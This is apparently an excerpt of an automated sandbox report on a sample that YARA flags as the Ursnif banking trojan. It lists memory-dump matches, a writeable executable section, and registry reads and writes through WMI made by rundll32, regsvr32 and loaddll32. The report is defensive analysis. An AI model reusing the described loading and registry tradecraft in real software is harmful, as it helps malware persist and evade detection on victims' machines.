            Source: Yara matchFile source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            E-Banking Fraud:

Yara detected Ursnif

            System Summary:

PE file has a writeable .text section
            Source: 6.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue